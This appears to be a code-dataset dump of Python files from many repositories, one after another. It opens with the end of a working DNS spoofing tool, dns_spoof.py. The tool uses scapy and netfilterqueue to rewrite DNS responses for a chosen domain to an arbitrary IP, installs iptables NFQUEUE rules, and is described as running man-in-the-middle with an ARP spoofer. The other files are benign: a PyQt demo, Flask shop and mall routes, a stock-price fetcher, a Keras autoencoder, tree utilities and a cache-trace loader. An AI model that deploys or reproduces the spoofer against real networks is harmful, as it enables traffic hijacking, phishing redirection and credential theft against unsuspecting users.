type(int), use --help for more info.\")\n return options\n\n# main function\ndef process_packet(packet):\n scapy_packet = scapy.IP(packet.get_payload()) # convert payload into a scapy packet\n if scapy_packet.haslayer(scapy.DNSRR): # check if packet has a dns response layer\n qname = scapy_packet[scapy.DNSQR].qname.decode(\"utf-8\")\n if target_website in qname:\n print(\"[+] Spoofing target\")\n answer = scapy.DNSRR(rrname=qname, rdata=modified_ip) # create a dns response, keep the name, change the ip to the prefered one\n scapy_packet[scapy.DNS].an = answer # modify the answer of the packet\n scapy_packet[scapy.DNS].ancount = 1 # modify the number of answers of the packet\n\n # remove variables that would corrupt the modified packet, scapy will auto redefine them\n del scapy_packet[scapy.IP].len\n del scapy_packet[scapy.IP].chksum\n del scapy_packet[scapy.UDP].chksum\n del scapy_packet[scapy.UDP].len\n\n packet.set_payload(bytes(scapy_packet)) # change the original payload of the packet with the modified one\n packet.accept() # allow forwarding the packet to it's destination\n # packet.drop() # deny forwarding the packet to it's destination\n\n\noptions = get_arguments()\ntarget_website = options.target # globally set\nmodified_ip = options.ip # globally set\nqueue_num = options.queue_num\n\nif int(options.preference):\n # To run this as man in the middle\n # !! DISCLAIMER: This app doesn't create a man in the middle, you need an arp spoofer running !!\n subprocess.run([\"iptables\", \"-I\", \"FORWARD\", \"-j\", \"NFQUEUE\", \"--queue-num\", queue_num])\nelse:\n # To run this locally\n subprocess.run([\"iptables\", \"-I\", \"OUTPUT\", \"-j\", \"NFQUEUE\", \"--queue-num\", queue_num])\n subprocess.run([\"iptables\", \"-I\", \"INPUT\", \"-j\", \"NFQUEUE\", \"--queue-num\", queue_num])\n\nqueue = netfilterqueue.NetfilterQueue() # object creation\nqueue.bind(int(queue_num), process_packet) # connect to an existed queue\n\ntry:\n queue.run()\nexcept KeyboardInterrupt:\n print(\"\\n[!] Detected CTRL + C ... FlUSHING IPTABLES...\")\n subprocess.run([\"iptables\", \"--flush\"])\n print(\"[+] Done.\")\n","sub_path":"dns_spoof.py","file_name":"dns_spoof.py","file_ext":"py","file_size_in_byte":3653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"437092942","text":"import random\nimport sys\nfrom PyQt5 import uic\nfrom PyQt5.QtGui import QPainter, QPixmap, QColor\nfrom PyQt5.QtWidgets import QApplication, QWidget, QMainWindow\nfrom Ui import Ui_MainWindow\n\n\nclass MyWidget(QMainWindow, Ui_MainWindow):\n def __init__(self):\n super().__init__()\n self.setupUi(self)\n self.pixmap = QPixmap(self.width(), self.height())\n self.pixmap.fill(QColor(255, 255, 255))\n self.pushButton.clicked.connect(self.run)\n\n def run(self):\n qp = QPainter(self.pixmap)\n qp.setBrush(QColor(random.randint(0, 255),\n random.randint(0, 255),\n random.randint(0, 255)))\n qp.drawEllipse(random.randint(0, self.width() - 50),\n random.randint(0, self.height() - 50),\n random.randint(15, 50),\n random.randint(15, 50))\n self.update()\n\n def paintEvent(self, e):\n qp = QPainter(self)\n qp.drawPixmap(0, 0, self.pixmap)\n\n\napp = QApplication(sys.argv)\nex = MyWidget()\nex.show()\nsys.exit(app.exec_())\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"97313189","text":"# !/bin/python3\r\n\r\nimport os\r\nimport sys\r\nimport inspect\r\n\r\n\r\ndef read_input(val_type=None, separator=None, ignore_empty=True):\r\n if len(sys.argv) > 1:\r\n fname = sys.argv[1]\r\n if not os.path.exists(fname):\r\n if len(sys.argv) == 2:\r\n if val_type:\r\n return val_type(sys.argv[1])\r\n return sys.argv[1]\r\n if val_type:\r\n return [val_type(value) for value in sys.argv[1:]]\r\n return sys.argv[1:]\r\n else:\r\n frame = inspect.stack()[1]\r\n module = inspect.getmodule(frame[0])\r\n fname = '{0}input.txt'.format(os.path.splitext(module.__file__)[0])\r\n\r\n if not os.path.exists(fname):\r\n return\r\n\r\n with open(fname) as f:\r\n inp = []\r\n for line in f.readlines():\r\n if ignore_empty:\r\n line = line.strip()\r\n else:\r\n line = line.replace('\\n', '').replace('\\r', '')\r\n if separator:\r\n values = line.split(separator)\r\n else:\r\n values = line\r\n\r\n if val_type:\r\n if type(values) is list:\r\n values = [val_type(value) for value in values]\r\n else:\r\n values = [val_type(values)]\r\n\r\n if len(values) == 1:\r\n values = values[0]\r\n\r\n inp.append(values)\r\n\r\n if len(inp) == 1:\r\n return inp[0]\r\n return inp\r\n","sub_path":"advent_of_code/2017/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"396202434","text":"#!/usr/bin/env python3\n \nimport argparse\nimport pandas as pd\n\nparser = argparse.ArgumentParser( description = \"Modify Treemix modelcov matrix for hapFLK input.\" )\nparser.add_argument(\"infile\", type = str, help = \"Treemix modelcov matrix\")\nparser.add_argument(\"outfile\", type=str, help = \"Output modelcov hapFLK compatible matrix (gzip compressed).\")\nparser.add_argument(\"--outgroup\", type=str, help= \"Outgroup name to remove\", default = \"p1\")\nargs = parser.parse_args()\n\ninfile = args.infile\noutfile = args.outfile\noutgroup = args.outgroup\n\n# read matrix\nm = pd.read_csv(infile, sep = \" \",skiprows=1, header = None)\n# get population names column\ncols = [\"pop\"]\ncols.extend(list(m[0]))\nm.columns = cols \n# modify df\nm = m.set_index(m[\"pop\"])\nm = m.drop(\"pop\", axis = 1 )\n# drop outgroup\nm = m.drop(outgroup,axis = 0).drop(outgroup, axis = 1 )\n# write\nm.to_csv(outfile,sep = \" \", header = False, index = True,index_label = False)\n\n\n\n\n\n\n","sub_path":"bin/prepare-modelcov.py","file_name":"prepare-modelcov.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"369017549","text":"from openpyxl import Workbook\nfrom openpyxl import load_workbook\n\nclass tree:\n #constructor\n def __init__(self, name_):\n self.name = name_\n self.name2 = ''\n self.children = []\n self.range = []\n\n #copy constructor\n def copy(self, Tree):\n self.name = Tree.name\n if Tree.is_leaf() == True:\n return\n else:\n for i in range(len(Tree.children)):\n self.children.append(tree('temp_name'))\n self.children[i].copy(Tree.children[i])\n\n #go to a certain Node from the beginning\n def getTo(self, path):\n temp = self\n for p in path:\n for i in range(len(temp.children)):\n if temp.children[i].name == p:\n temp = temp.children[i]\n break\n if temp.name != path[-1]:\n print(\"Path does not exist\")\n return None\n return temp\n\n \n #add a leaf under current tree\n def add_child(self, name):\n temp = tree(name)\n self.children.append(temp)\n\n\n #add a leaf under certain node\n #@parent: list of parent \n def add(self, name_, parents):\n temp = self\n temp = self.getTo(parents)\n if temp != None:\n temp.add_child(name_) \n else:\n return None\n \n\n\n #add multiple leaf under all current leaf nodes\n #@names: list of nodes' name to be added\n def add_multiples(self, names):\n if self.is_leaf() == True:\n for name in names:\n temp = tree(name)\n self.children.append(temp)\n return\n for i in range(len(self.children)):\n self.children[i].add_multiples(names)\n \n #add multiple trees under all current leaf nodes\n #@trees: list of trees' name to be added\n def connect(self, trees):\n if self.is_leaf() == True:\n for Tree in trees:\n tempTree = tree('temp_name')\n tempTree.copy(Tree)\n self.children.append(tempTree)\n return\n for i in range(len(self.children)):\n self.children[i].connect(trees)\n\n #determine if current node is leaf \n def is_leaf(self):\n if len(self.children) == 0:\n return True\n else:\n return False\n\n\n #add range for leaves\n def addLeafRange(self, range_):\n if self.is_leaf() == True:\n self.range = range_.copy()\n else:\n print(\"Not a leaf, error\")\n return\n\n\n #add range for branches\n def addbranchRange(self):\n if self.is_leaf() == False:\n self.range = [self.FindLow(), self.FindHigh()]\n else:\n print(\"Not a branch, error\")\n return\n\n def FindLow(self):\n if self.is_leaf() == True:\n return self.range[0]\n return self.children[0].FindLow()\n\n def FindHigh(self):\n if self.is_leaf() == True:\n return self.range[-1]\n return self.children[-1].FindHigh()\n\n\n #add all the range \n #call after all the nodes have beeen added\n def add_range(self):\n curr_index = [0]\n self.traversal1(curr_index)\n self.traversal2()\n return\n\n def traversal1(self, curr_index):\n if self.is_leaf() == True:\n self.addLeafRange([curr_index[-1], curr_index[-1] + 1])\n return curr_index.append(curr_index[-1] + 1)\n for i in range(len(self.children)):\n self.children[i].traversal1(curr_index)\n return\n\n def traversal2(self):\n if self.is_leaf() == True:\n return\n self.addbranchRange()\n for i in range(len(self.children)):\n self.children[i].traversal2()\n \n #obtain all the leave nodes\n def getLeaves(self):\n leaves = []\n self.getLeaves_helper(leaves)\n return leaves\n\n def getLeaves_helper(self, leaves):\n if self.is_leaf() == True:\n leaves.append(self)\n return\n for i in range(len(self.children)):\n self.children[i].getLeaves_helper(leaves)\n return\n\n #print the tree\n def printTree(self):\n '''\n print()\n print(self.name, \": \", end = '' )\n for i in range(len(self.children)):\n print(self.children[i].name, ', ', end = '')\n '''\n print(self.name, \" \", self.range)\n for i in range(len(self.children)):\n self.children[i].printTree()\n return\n \n #count number of nodes\n def count(self):\n if self.is_leaf() == True:\n return 1\n total = 1\n for i in range(len(self.children)):\n total += self.children[i].count()\n return total\n \n def countleaves(self):\n if self.is_leaf() == True:\n return 1\n total = 0\n for i in range(len(self.children)):\n total += self.children[i].countleaves()\n return total\n\n\n #Change structure of the tree from list to dictionary to improve runtime \n def to_dict(self):\n temp = {}\n for i in range(len(self.children)):\n temp[self.children[i].name] = self.children[i]\n if self.is_leaf() == False:\n self.children[i].to_dict()\n self.children = temp\n \n #goint to a certain node from the beginning after turning into dictionary\n def getTod(self, path):\n temp = self\n for p in path[1::]:\n try:\n temp = temp.children[p]\n except BaseException:\n print('Path does not exist')\n return None\n return temp\n","sub_path":"tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":5631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"558176974","text":"print('INICIALIZANDO')\nimport time\nimport socket\n\nimport sys\nimport select\nimport time\nimport threading\nimport queue\n\nread_list = [sys.stdin]\ntimeout = 0.1 # seconds\nlast_work_time = time.time()\n\nprint('1')\ntime.sleep(2)\nprint('2')\ntime.sleep(2)\nprint('3')\ntime.sleep(2)\nprint('INICIALIZANDO_SERVER')\ns = socket.socket()\nai = socket.getaddrinfo(\"10.0.100.13\",8080)[0][-1]\ns.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)\ns.bind(ai)\ns.listen(1)\ncounter = 0\nwhile True:\n res = s.accept()\n client_s = res[0]\n client_addr = res[1]\n print('ESPERANDO_COMANDO_DO_CLIENTE')\n req = client_s.recv(4096)\n print('CLIENTE_ENVIOU')\n print(req.decode('ascii'))\n time.sleep(2)\n a = input()\n print(a)\n client_s.send('ASW=' + a +'');\n client_s.close()\n counter += 1\n\n\ndef something(line):\n print('read input:', line, end='')\n\ndef something_else():\n print('no input')\n","sub_path":"esp-micropython/main-1.py","file_name":"main-1.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"225258932","text":"# Do not modify these lines\r\n__winc_id__ = '7b9401ad7f544be2a23321292dd61cb6'\r\n__human_name__ = 'arguments'\r\n\r\n# Add your code after this line\r\ndef greet(name='name', greeting='Hello, !'):\r\n replace_name = greeting.replace('',name)\r\n return replace_name\r\n\r\n\r\ndef force(mass=1, body='earth'):\r\n planets= {'sun':274,\r\n 'jupiter':24.9,\r\n 'neptune':11.2,\r\n 'saturn':10.4,\r\n 'earth':9.8,\r\n 'uranus':8.9,\r\n 'venus':8.9,\r\n 'mars':3.7,\r\n 'mercury':3.7,\r\n 'moon':1.6,\r\n 'pluto':0.6\r\n }\r\n return round(float((mass) * (planets[body])),1)\r\n\r\ndef pull(m1,m2,d):\r\n return (6.674*(10**-11)) * ((m1*m2)/d**2)\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"9083364","text":"#pip install yfinance\nimport yfinance as yf\nimport pandas as pd\nimport datetime as dt\n\ndef get_ticker():\n return input()\n\ndef get_ticker_data(ticker):\n the_ticker = yf.Ticker(ticker)\n hist = the_ticker.history(period=\"2y\")\n hist = hist.reset_index()\n #type(hist) #pandas dataframe\n df_Stock = pd.DataFrame()\n df_Stock = df_Stock.assign(Close = hist['Close'].values)\n df_Stock = df_Stock.assign(Date = hist['Date'].values)\n return df_Stock\n\ndef date_split(date):\n #input is in the form of '2020-04-27'\n date = date.split('-')\n next_date = dt.date(int(date[0]), int(date[1]), int(date[2]))\n return next_date\n\ndef date_string(date):\n #input is a datetime object\n return date.strftime(\"%Y-%m-%d\")\n\ndef get_start_date(df):\n #gets the first monday\n bool = True\n i = 0\n while bool:\n start_date = date_string(df['Date'][i])\n date_list = start_date.split('-')\n if dt.date(int(date_list[0]), int(date_list[1]), int(date_list[2])).weekday() == 0:\n bool = False\n print(start_date)\n return start_date\n else:\n i += 1\n\ndef get_weekly_data(df, start_date, ticker):\n df_week = pd.DataFrame()\n test_list = []\n next_date = start_date\n test_list.append(next_date)\n while df['Date'][len(df)-1] >= date_split(next_date):\n next_date = date_split(next_date) + dt.timedelta(days = 7)\n next_date = date_string(next_date)\n test_list.append(next_date)\n\n test_list.pop(-1)\n for i in range(len(test_list)):\n df_week = df_week.append(df.loc[df['Date'] == test_list[i]])\n price = ticker+' Closing price'\n time = ticker+' Date'\n df_week = df_week.rename(columns = {'Close': price, 'Date': time})\n return df_week\n\ndef get_stock_inputs():\n number = input() # max idk\n number = int(number)\n ticker_list = []\n for i in range(1, number+1):\n ticker_list.append(input())\n i += 1\n return ticker_list\n\ndef get_stock_data(ticker_list):\n df_final = pd.DataFrame()\n for i in range(len(ticker_list)):\n try:\n data = get_ticker_data(ticker_list[i])\n date1 = get_start_date(data)\n df = get_weekly_data(data, date1, ticker_list[i])\n except (KeyError, IndexError) as e:\n continue\n df_final = pd.concat([df_final, df], axis = 1)\n if i != 0:\n #print(df_final[ticker_list[i]+' Date'].tolist() == df_final[ticker_list[0]+' Date'].tolist())\n if df_final[ticker_list[i]+' Date'].tolist() == df_final[ticker_list[0]+' Date'].tolist():\n df_final = df_final.drop(ticker_list[i]+ ' Date', axis = 1)\n cols = df_final.columns.tolist()\n index = cols[1]\n cols.remove(ticker_list[0]+' Date')\n cols.append(index)\n df_final = df_final[cols]\n df_final = df_final.rename(columns={ticker_list[0]+' Date': 'Date'})\n return df_final\n\n\ndef s_turn_to_csv(df):\n df.to_csv('stock.csv', index = False)\n\n#test implementation\ntest = get_stock_inputs()\ndf = get_stock_data(test)\ns_turn_to_csv(df)\n\n#random_ticker implementation\ndatapath = f\"D://work/stonks/random_tickers.csv\"\ndata = pd.read_csv(datapath)\nthe_list = data.values.tolist()\nlist_ = []\nfor i in range(len(the_list)):\n list_.append(the_list[i][0])\ntickers_df = get_stock_data(list_)\ns_turn_to_csv(tickers_df)\n","sub_path":"stock_api.py","file_name":"stock_api.py","file_ext":"py","file_size_in_byte":3351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"379652853","text":"from flask import Blueprint, jsonify, request\nfrom elasticsearch_dsl import Search\nfrom elasticsearch_dsl.query import MultiMatch, Match\nfrom reddit.errors import InvalidUsage\n\n\nbp = Blueprint(\"search\", __name__, url_prefix=\"/api/v1/search\")\n\n\n@bp.route('', methods=['GET'])\ndef search():\n try:\n query = request.args['q']\n except KeyError as ex:\n raise InvalidUsage.validation_error()\n \n search = Search(index='threads')\n search.query = MultiMatch(query=query, fields=['title', 'body', 'description'])\n response = search.execute()\n return jsonify(response.to_dict())\n","sub_path":"reddit/search/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"108881057","text":"from typing import List\n\n#define the Solution class\nclass Solution:\n #define twoSum() method in which two methods of having these must type and return list of int.\n def twoSum(self,nums:List[int],target : int) -> List[int]: \n for i in range(0,len(nums)):\n for j in range(0,len(nums)):\n if (nums[i]+nums[j] == target) and (i < j):\n return list((i,j))\nprint(Solution().twoSum([2,4,5,6,9],9))\n","sub_path":"two-sum/Solve.py","file_name":"Solve.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"157278677","text":"from flask import Blueprint, render_template, request, current_app\nfrom jobplus.models import Job\nfrom datetime import datetime\n\n\n\njob = Blueprint('job', __name__, url_prefix='/job')\n\n\n@job.route('/')\ndef index():\n page = request.args.get('page',default=1, type=int)\n pagination = Job.query.paginate(\n page=page,\n per_page=current_app.config['JOBINDEX_PER_PAGE'],\n error_out=False\n )\n\n\n return render_template('job/index.html', pagination=pagination)\n","sub_path":"jobplus/handlers/job.py","file_name":"job.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"205136140","text":"from flask import Flask\nimport yaml\nimport json\n\napp = Flask(__name__)\n\ndef merge_two_dicts(x, y):\n z = x.copy()\n z.update(y)\n return z\n\ndef create_hal_object(id, object):\n halified = {\n 'id': id,\n \"_links\": {\n \"self\": { \"href\": \"/laptimes/\"+id },\n \"tracks\": { \"href\": \"/tracks/\"+id }\n }\n }\n return merge_two_dicts(halified, object)\n\n@app.route(\"/laptimes/\")\ndef laptimes(id):\n config = yaml.load(open('laptimes.yml'))\n return json.dumps(create_hal_object(str(id), config['laptimes'][str(id)]))\n\napp.run(host='0.0.0.0')\n\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"473404125","text":"import numpy as np\nnp.random.seed(1337)\nfrom keras.datasets import mnist\nfrom keras.models import Model\nfrom keras.layers import Dense,Input\nimport matplotlib.pyplot as plt\n\n(x_train,_),(x_test,y_test)=mnist.load_data()\n\nx_train=x_train.astype('float32')/255.-0.5\nx_test=x_test.astype('float32')/255.-0.5\nx_train=x_train.reshape((x_train.shape[0],-1))\nx_test=x_test.reshape((x_test.shape[0],-1))\nprint(x_train.shape)\nprint(x_test.shape)\n\nencoding_dim=2\ninput_img=Input((784,))\n#encode_layers\nencoded=Dense(128,activation='relu')(input_img) #后面括号是输入,这里是压缩层\nencoded=Dense(64,activation='relu')(encoded)\nencoded=Dense(10,activation='relu')(encoded)\nencoder_output=Dense(encoding_dim,)(encoded)\n#decoder layers\ndecoded=Dense(10,activation='relu')(encoder_output)\ndecoded=Dense(64,activation='relu')(decoded)\ndecoded=Dense(128,activation='relu')(decoded)\ndecoded=Dense(784,activation='tanh')(decoded)\n#组建autoencoder\nautoencoder=Model(input=input_img,outputs=decoded)\n#组建单独的encoder\nencoder=Model(inputs=input_img,outputs=encoder_output)\nautoencoder.compile(optimizer='adam',loss='mse')\n#training\nautoencoder.fit(x_train,x_train,nb_epoch=50,batch_size=256,shuffle=True) #压缩解压同一数据对比结果\n#plotting\nencoded_imgs=encoder.predict(x_test)\nplt.scatter(encoded_imgs[:,0],encoded_imgs[:,1],c=y_test)\nplt.show()\n","sub_path":"CODE/AutoEncoder.py","file_name":"AutoEncoder.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"370711842","text":"from copy import deepcopy\n\nfrom flask import jsonify, request\n\nfrom server.app import app\nfrom server.app import db\nfrom server.models import Shop, Mall\nfrom flask_cors import cross_origin\n\n\ndef convert_shops_to_dict(shops: list) -> list:\n row = []\n for shop in shops:\n dict_shop = {\n 'id': shop.id,\n 'Type': shop.Type,\n 'Name': shop.Name,\n 'City': '',\n 'Mall': '',\n 'District': '',\n }\n if not shop.malls:\n row.append(dict_shop)\n else:\n for mall in shop.malls:\n temp_shop = deepcopy(dict_shop)\n temp_shop['City'] = mall.City\n temp_shop['Mall'] = mall.Name\n temp_shop['District'] = mall.District\n row.append(temp_shop)\n\n return row\n\n\ndef convert_malls_to_dict(malls):\n row = []\n for mall in malls:\n appended = False\n temp_mall = {\n 'id': mall.id,\n 'Name': mall.Name,\n 'City': mall.City,\n 'District': mall.District,\n 'Shop': '',\n }\n # row.append(temp_mall)\n # if not mall.shops:\n # row.append(temp_mall)\n # else:\n\n temp_shop = deepcopy(temp_mall)\n for shop in mall.shops:\n temp_shop = deepcopy(temp_mall)\n temp_shop['Shop'] = shop.Name\n row.append(temp_shop)\n appended = True\n\n if not appended:\n row.append(temp_shop)\n # appended = False\n\n return row\n\n\n@app.route('/shops', methods=['GET', 'POST'])\ndef all_shops():\n response_object = {'status': 'success'}\n if request.method == 'POST':\n post_data = request.get_json()\n # SHOPS.append({\n # 'id': post_data.get('id'),\n # 'Mall': post_data.get('Mall'),\n # 'Type': post_data.get('Type'),\n # 'Name': post_data.get('Name'),\n # 'City': post_data.get('City'),\n # 'District': post_data.get('District')\n # })\n shop = Shop.query.filter_by(Name=post_data.get('Name')).first()\n if shop is None:\n\n shop = Shop(\n Type=post_data.get('Type'),\n Name=post_data.get('Name'),\n )\n db.session.add(shop)\n\n mall = Mall.query.filter_by(Name=post_data.get('Mall')).first()\n if mall is None:\n mall = Mall(\n Name=post_data.get('Mall'),\n City=post_data.get('City'),\n District=post_data.get('District')\n )\n db.session.add(mall)\n repeated_mall = list(filter(lambda mall: mall.Name == post_data.get('Mall'), shop.malls))\n if not(repeated_mall):\n shop.malls.append(mall)\n db.session.add(shop)\n db.session.add(mall)\n db.session.commit()\n response_object['message'] = 'Shop added!'\n else:\n response_object['message'] = 'Shop is already in the mall!'\n else:\n shops = Shop.query.all()\n row = convert_shops_to_dict(shops)\n\n return jsonify({\n 'status': 'success',\n 'shops': row\n })\n\n\ndef remove_shop(shop_id, mall_id):\n # db.session.query(Shop).filter(Shop.id == shop_id).delete()\n shop_to_remove = Shop.query.filter(Shop.id == shop_id).first()\n if (not shop_to_remove.malls and mall_id == \"empty\") or len(shop_to_remove.malls) == 1:\n db.session.query(Shop).filter(Shop.id == shop_id).delete()\n else:\n for mall in shop_to_remove.malls:\n if mall.Name == mall_id:\n shop_to_remove.malls.remove(mall)\n break\n db.session.commit()\n\n\ndef remove_malls(mall_id):\n db.session.query(Mall).filter(Mall.id == mall_id).delete()\n db.session.commit()\n\n\n@app.route('/shops//', methods=['PUT', 'DELETE', 'OPTIONS'])\ndef single_shop(shop_id, mall_id):\n response_object = {\n 'status': 'success',\n 'message': 'Shop updated!'\n }\n if request.method == 'PUT':\n post_data = request.get_json()\n # remove_shop(shop_id)\n mall = Mall.query.filter_by(Name=post_data.get('Mall')).first()\n\n # shop = Shop.query.filter_by(Name=post_data.get('Name')).first()\n\n shop_by_id = Shop.query.filter_by(id=shop_id).first()\n if shop_by_id.Name == post_data.get('Name'):\n shop_by_id.Type = post_data.get('Type')\n else:\n shop_by_id.Type = post_data.get('Type')\n shop_by_id.Name = post_data.get('Name')\n\n repeated_mall = list(filter(lambda mall_: mall_.Name == post_data.get('Mall'), shop_by_id.malls))\n if not repeated_mall:\n response_object['message'] = 'Shop was not updated!'\n for mall_in_shop in shop_by_id.malls:\n if mall_in_shop.Name == mall_id:\n shop_by_id.malls.remove(mall_in_shop)\n if mall is None:\n mall = Mall(\n Name=post_data.get('Mall'),\n City=post_data.get('City'),\n District=post_data.get('District')\n )\n # db.session.add(mall)\n else:\n mall.City = post_data.get('City')\n mall.District = post_data.get('District')\n db.session.add(mall)\n shop_by_id.malls.append(mall)\n db.session.add(shop_by_id)\n\n # db.session.add(shop_by_id)\n db.session.commit()\n # remove_shop(shop_id)\n response_object['message'] = 'Shop updated!'\n else:\n mall.City = post_data.get('City')\n mall.District = post_data.get('District')\n response_object['message'] = 'Shop was not updated!'\n db.session.add(shop_by_id)\n db.session.commit()\n if request.method == 'DELETE':\n remove_shop(shop_id, mall_id)\n response_object['message'] = 'Shop removed!'\n return jsonify(response_object)\n\n\n@app.route('/malls', methods=['GET', 'POST'])\ndef all_malls():\n response_object = {'status': 'success'}\n if request.method == 'POST':\n post_data = request.get_json()\n mall = Mall.query.filter_by(Name=post_data.get('Name')).first()\n if mall is None:\n mall = Mall(\n Name=post_data.get('Name'),\n City=post_data.get('City'),\n District=post_data.get('District')\n )\n db.session.add(mall)\n db.session.commit()\n response_object['message'] = 'Mall added!'\n else:\n malls = Mall.query.all()\n row = convert_malls_to_dict(malls)\n\n return jsonify({\n 'status': 'success',\n 'malls': row\n })\n\n\n@app.route('/malls/', methods=['PUT', 'DELETE'])\ndef single_mall(mall_id):\n response_object = {\n 'status': 'success',\n 'message': 'Mall updated!'\n }\n if request.method == 'PUT':\n post_data = request.get_json()\n mall = Mall.query.filter_by(id=mall_id).first()\n mall.City = post_data.get('City')\n mall.District = post_data.get('District')\n mall.Name = post_data.get('Name')\n db.session.add(mall)\n db.session.commit()\n if request.method == 'DELETE':\n remove_malls(mall_id)\n response_object['message'] = 'Mall removed!'\n return jsonify(response_object)\n\n\n@app.route('/ping', methods=['GET'])\ndef ping_pong():\n return jsonify('pong!')\n","sub_path":"lab3/server/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":7519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"608596977","text":"from FCS import Fcs\nfrom tkinter import filedialog\nimport os\nimport re\nfrom tkinter import Tk\n\n# 选择路径\nroot = Tk()\nroot.withdraw()\nFpath = filedialog.askdirectory()\n\n# 读取panel表信息\npanel_file = Fpath + \"/panel.xlsx\"\npanel_tuple = Fcs.export_panel_tuple(panel_file)\nprint(panel_tuple)\n\nfor filename in [filename for filename in os.listdir(Fpath) if os.path.splitext(filename)[1] == \".fcs\"]:\n file = Fpath + '/' + filename\n fcs = Fcs(file)\n\n\n pars = fcs.delete_channel(fcs.pars, 89, 115, 140, 115)\n # pars = fcs.marker_rename(fcs.pars, *panel_tuple)\n # stain_channel_index = fcs.get_stain_channels(pars)\n #\n # # 添加event_length, 191, 193, 194, 140\n # add_channel = [\"Event_length\", \"Ir191Di\", \"Ir193Di\", \"Pt194Di\", \"Ce140Di\"]\n # add_index = [i + 1 for i in range(0, len(pars)) if pars[i].par_short_name in add_channel]\n # stain_channel_index.extend(add_index)\n # pars = [pars[i] for i in range(0, len(pars)) if i + 1 in stain_channel_index]\n\n # 根据当前的filename去查找新的name\n new_filename = re.sub(\"-\", \"\", filename)\n # new_filename = re.sub(\"^.+?_\", \"gsH_\", new_filename)\n new_file = Fpath + \"/WriteFcs/\" + new_filename\n\n fcs.write_to(new_file, pars)\n","sub_path":"FCS5/fcs_rename_3.py","file_name":"fcs_rename_3.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"279753873","text":"import mts_cache_algorithm\r\nimport operator \r\nimport time\r\nimport sys\r\ntrace = open(\"trace.result\", \"a\")\r\n# def load_file(filename, alg, periodSize=10**5, throt=500, watch=1, predict=5):\r\n# \ti = 0\r\n# \treadReq = 0\r\n# \tperiod = 1\r\n# \tstatus = \"watch\"\r\n# \twatchDict = {}\r\n# \tpredictDict = {}\r\n# \tssd = alg(throt)\r\n# \tfin = open(filename, 'r', encoding='utf-8', errors='ignore')\r\n# \tlines = fin.readlines()\r\n# \tlineNum = len(lines)\r\n# \tprint(filename, alg, periodSize, throt, watch, predict, file=trace)\r\n\t\r\n# \tfor line in lines:\r\n# \t\ti += 1\r\n# \t\t# print(readReq, period, watchDict, predictDict)\r\n# \t\titems = line.split(' ')\r\n# \t\treqtype = int(items[0])\r\n# \t\tblock = int(items[2])\r\n\r\n# \t\tif reqtype == 1:\r\n# \t\t\tcontinue\r\n\r\n# \t\treadReq += 1\r\n# \t\tif status == \"watch\":\r\n# \t\t\tssd.update_cache(block)\r\n# \t\t\twatchDict = recordReq(block, watchDict)\r\n# \t\telse:\r\n# \t\t\tpredictDict = recordReq(block, predictDict)\r\n\r\n# \t\tif readReq >= periodSize:\r\n# \t\t\t# print(\"period increase\", readReq, period)\r\n# \t\t\treadReq = 0\r\n# \t\t\tperiod += 1\r\n# \t\t\tif status == \"watch\" and (period%(watch+predict)) > watch:\r\n# \t\t\t\tstatus = \"predict\"\r\n# \t\t\telif status == \"predict\" and (period%(watch+predict)) == 1:\r\n# \t\t\t\toutputResult(watchDict, predictDict, ssd, period-1)\r\n# \t\t\t\tprint(i, \"************************************\", file=trace)\r\n# \t\t\t\tstatus = \"watch\"\r\n# \t\t\t\twatchDict = {}\r\n# \t\t\t\tpredictDict = {}\r\n# \t\t\t\tssd = alg(throt)\r\n# \t\t\telif status == \"predict\":\r\n# \t\t\t\toutputResult(watchDict, predictDict, ssd, period-1)\r\n# \t\t\t\tpredictDict = {}\r\n\r\n# \tfin.close()\r\n\r\ndef init_predictSize(throt):\r\n\tpredictSize = 100\r\n\twhile predictSize < throt:\r\n\t\tpredictSize = predictSize * 10\r\n\treturn predictSize\r\n\r\ndef load_file_time_window(filename, alg, periodSize=10**5, throt=500):\r\n\ti = 0\r\n\treadReq = 0\r\n\tperiod = 1\r\n\tstatus = \"watch\"\r\n\twatchDict = {}\r\n\tpredictDict = {}\r\n\tpredictSize = init_predictSize(throt)\r\n\tssd = alg(throt)\r\n\tfin = open(filename, 'r', encoding='utf-8', errors='ignore')\r\n\tlines = fin.readlines()\r\n\tlineNum = len(lines)\r\n\tprint(filename, alg, periodSize, throt, file=trace)\r\n\t\r\n\tfor line in lines:\r\n\t\ti += 